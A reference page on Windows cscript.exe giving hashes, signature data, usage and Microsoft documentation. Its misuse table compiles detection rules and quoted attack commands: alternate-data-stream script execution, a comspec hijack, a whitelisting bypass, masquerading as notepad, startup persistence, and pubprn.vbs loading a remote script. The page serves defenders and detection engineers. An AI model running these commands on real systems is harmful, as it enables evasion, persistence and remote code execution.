cscript.exe

  • File Path: C:\Windows\SysWOW64\cscript.exe
  • Description: Microsoft Console Based Script Host

Hashes

Type Hash
MD5 25F006365CE5690FE06550D634FE36A1
SHA1 E4FBC12ED94CFEA102F30ED5ECA4AB17F041EC7A
SHA256 873A28C3A6D1D6278B4FA422F65FADF18150301D31B9AFA694BDB5E3BD6A165D
SHA384 B340B725D60CF8EC0738702919A1A64A64EE5FCD14D2BBE07776D09666208F4024D000F115E8DC5B444F1EED3347D2F7
SHA512 41AC4A9467E454B0FA85BE214FDE500B81442F523CCCBFA341ADC58FDDC62B2FECA7BCD5FC2B929904E481FCAF72AC2B759901146485E96F529DC591A2DD3CDA
SSDEEP 3072:jjwuzjgBKnIdnFhh9GD2qdmwEWxWKdGxB0yqTxt30IB:jx3nIdFhh9SEWxQB0lTH

Runtime Data

Usage (stdout):

Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Usage: CScript scriptname.extension [option...] [arguments...]

Options:
 //B         Batch mode: Suppresses script errors and prompts from displaying
 //D         Enable Active Debugging
 //E:engine  Use engine for executing script
 //H:CScript Changes the default script host to CScript.exe
 //H:WScript Changes the default script host to WScript.exe (default)
 //I         Interactive mode (default, opposite of //B)
 //Job:xxxx  Execute a WSF job
 //Logo      Display logo (default)
 //Nologo    Prevent logo display: No banner will be shown at execution time
 //S         Save current command line options for this user
 //T:nn      Time out in seconds:  Maximum time a script is permitted to run
 //X         Execute script in debugger
 //U         Use Unicode for redirected I/O from the console

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: cscript.exe.mui
  • Product Name: Microsoft Windows Script Host
  • Company Name: Microsoft Corporation
  • File Version: 5.812.10240.16384
  • Product Version: 5.812.10240.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of cscript.exe being misused. While cscript.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\cscript.exe' DRL 1.0
sigma godmode_sigma_rule.yml - 'cscript' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\cscript.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'cscript' DRL 1.0
sigma file_event_win_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - '\cscript.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\cscript.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\cscript.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml description: Adversaries can abuse of C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml description: Detects wscript/cscript executions of scripts located in user directories DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mal_adwind.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_manage_bde_lolbas.yml - 'cscript' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - cscript.exe DRL 1.0
sigma proc_creation_win_office_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml title: Cscript Visual Basic Script Execution DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml Image\|endswith: \cscript.exe DRL 1.0
sigma proc_creation_win_susp_powershell_parent_combo.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml title: Suspicious Registration via cscript.exe DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml - https://ss64.com/vb/cscript.html DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_execution.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_susp_script_execution.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma proc_creation_win_susp_winrm_execution.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\cscript.exe' DRL 1.0
sigma registry_event_susp_run_key_img_folder.yml - 'cscript' DRL 1.0
LOLBAS Testxlst.yml - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out  
LOLBAS Cscript.yml Name: Cscript.exe  
LOLBAS Cscript.yml - Command: cscript c:\ads\file.txt:script.vbs  
LOLBAS Cscript.yml Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).  
LOLBAS Cscript.yml - Path: C:\Windows\System32\cscript.exe  
LOLBAS Cscript.yml - Path: C:\Windows\SysWOW64\cscript.exe  
LOLBAS Cscript.yml - IOC: Cscript.exe executing files from alternate data streams  
LOLBAS Cscript.yml - IOC: DotNet CLR libraries loaded into cscript.exe  
LOLBAS Cscript.yml - IOC: DotNet CLR Usage Log - cscript.exe.log  
LOLBAS Manage-bde.yml - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf  
LOLBAS Manage-bde.yml - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf  
LOLBAS Winrm.yml - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'  
LOLBAS Winrm.yml Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location  
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md cscript #{vbscript} > $env:TEMP\T1059.005.out.txt MIT License. © 2018 Red Canary
atomic-red-team T1082.md cscript #{vbscript} MIT License. © 2018 Red Canary
atomic-red-team T1105.md CScript.exe AtomicTestT1105.js //E:JScript MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md $macrocode = “ Open "#{jse_path}” For Output As #1n Write #1, “WScript.Quit"n Close #1n Shell$ "cscript.exe #{jse_path}“`n” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Uses cscript //E:jscript to download a file MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md cscript //E:Jscript #{script_file} MIT License. © 2018 Red Canary
atomic-red-team T1216.md cscript %windir%\System32\manage-bde.wsf MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost “script:#{remote_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse” MIT License. © 2018 Red Canary
signature-base apt_monsoon.yar $x3 = “ cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d” fullword wide CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = “cscript.exe //T:20 //Nologo “ fullword ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $a1 = “taskkill /F /IM cscript.exe” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = “/c "C:\windows\temp\cscript" C:\windows\temp\iis.vbs” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_wannacry.yar $s2 = “cscript.exe //nologo m.vbs” fullword ascii CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

cscript

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Starts a script to run in a command-line environment.

[!IMPORTANT] Performing this task does not require you to have administrative credentials. Therefore, as a security best practice, consider performing this task as a user without administrative credentials.

Syntax

cscript <scriptname.extension> [/b] [/d] [/e:<engine>] [{/h:cscript | /h:wscript}] [/i] [/job:<identifier>] [{/logo | /nologo}] [/s] [/t:<seconds>] [x] [/u] [/?] [<scriptarguments>]
Parameters
Parameter Description
scriptname.extension Specifies the path and file name of the script file with optional file name extension.
/b Specifies batch mode, which does not display alerts, scripting errors, or input prompts.
/d Starts the debugger.
/e:<engine> Specifies the engine that is used to run the script.
/h:cscript Registers cscript.exe as the default script host for running scripts.
/h:wscript Registers wscript.exe as the default script host for running scripts. The default.
/i Specifies interactive mode, which displays alerts, scripting errors, and input prompts. The default, and the opposite of /b.
/job:<identifier> Runs the job identified by identifier in a .wsf script file.
/logo Specifies that the Windows Script Host banner is displayed in the console before the script runs. The default, and the opposite of /nologo.
/nologo Specifies that the Windows Script Host banner is not displayed before the script runs.
/s Saves the current command-prompt options for the current user.
/t:<seconds> Specifies the maximum time the script can run (in seconds). You can specify up to 32,767 seconds. The default is no time limit.
/u Specifies Unicode for input and output that is redirected from the console.
/x Starts the script in the debugger.
/? Displays available command parameters and provides help for using them. The same as typing cscript.exe with no parameters and no script.
scriptarguments Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/).
Remarks

  • Each parameter is optional; however, you can’t specify script arguments without specifying a script. If you don’t specify a script or any script arguments, cscript.exe displays the cscript.exe syntax and the valid host options.

  • The /t parameter prevents excessive running of scripts by setting a timer. When the run time exceeds the specified value, cscript interrupts the script engine and ends the process.

  • Windows script files usually have one of the following file name extensions: .wsf, .vbs, .js. Windows Script Host can use .wsf script files. Each .wsf file can use multiple scripting engines and perform multiple jobs.

  • if you double-click a script file with an extension that has no association, the Open With dialog box appears. Select wscript or cscript, and then select Always use this program to open this file type. This registers wscript.exe or cscript as the default script host for files of this file type.

Additional References

MIT License. Copyright (c) 2020-2021 Strontic.